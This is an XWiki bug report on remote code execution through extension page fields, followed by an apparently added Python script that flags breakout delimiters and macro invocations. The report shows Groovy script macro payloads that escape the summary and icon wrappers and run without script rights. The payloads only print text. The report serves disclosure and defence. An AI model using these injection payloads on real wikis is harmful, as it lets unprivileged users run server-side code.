XWiki Platform
XWIKI-21890

Remote code execution through the extension sheet



    Description

      Steps to reproduce:

      1. As a user without script or programming rights, in any extension page, add the following content to the description:

      {{async}}{{groovy}}println("Hello from Description"){{/groovy}}{{/async}}

      2. Save or preview the extension page.

      Expected result:

      An error is displayed because the user doesn't have script or programming rights.

      Actual result:

      "Hello from Description" is displayed without any error.

      The same vulnerability also exists in the installation instructions. The summary is vulnerable with

      }}}{{async}}{{groovy}}println("Hello from Summary"){{/groovy}}{{/async}}

      and the icon with

      ]]{{async}}{{groovy}}println("Hello from Icon"){{/grovy}}{{/async}}

      Other fields might be vulnerable as well.
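As an added example (not XWiki's own code), a small audit script that flags the pattern described above in extension page fields: closing delimiters that break out of the construct a field is rendered inside, and macro invocations in fields that are rendered as wiki content. The mapping of the summary to a verbatim block and the icon to a link is an assumption inferred from the payloads in the report, and the sample values are constructed to mirror them.

```python
import re

# Assumption (inferred from the report): the summary is rendered inside a verbatim
# block ({{{ ... }}}) and the icon inside a link ([[ ... ]]), so those closing
# sequences let a value break out of its wrapper; the description is rendered as
# wiki content directly, so any macro invocation there is already a finding.
FIELD_CLOSERS = {
    "description": [],
    "summary": ["}}}"],
    "icon": ["]]"],
}

# Opening macro invocations such as {{async}} or {{groovy}}; closing tags
# ({{/groovy}}) are deliberately not matched, so each macro is reported once.
MACRO_OPEN = re.compile(r"\{\{\s*([A-Za-z][\w-]*)")


def scan_field(field, value):
    """Return a list of findings for one extension field value."""
    findings = []
    for closer in FIELD_CLOSERS.get(field, []):
        if closer in value:
            findings.append("%s: contains %r, which closes the enclosing construct"
                            % (field, closer))
    for m in MACRO_OPEN.finditer(value):
        findings.append("%s: macro invocation {{%s}} at offset %d"
                        % (field, m.group(1), m.start()))
    return findings


def scan_extension(fields):
    """Scan every field of an extension page; an empty list means nothing to review."""
    findings = []
    for name, value in fields.items():
        findings.extend(scan_field(name, value))
    return findings


# Constructed sample mirroring the payloads in the report, plus a benign field.
SAMPLE_EXTENSION = {
    "description": '{{async}}{{groovy}}println("Hello from Description"){{/groovy}}{{/async}}',
    "summary": '}}}{{async}}{{groovy}}println("Hello from Summary"){{/groovy}}{{/async}}',
    "icon": ']]{{async}}{{groovy}}println("Hello from Icon"){{/groovy}}{{/async}}',
    "version": "1.2.3",
}

if __name__ == "__main__":
    for line in scan_extension(SAMPLE_EXTENSION):
        print(line)
```

Running the script on the sample lists the two macro invocations in each field plus the breakout delimiter in the summary and icon; the benign version string produces no finding.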

      People

        Pierre Jeanjean (pjeanjean)
        Michael Hamann (MichaelHamann)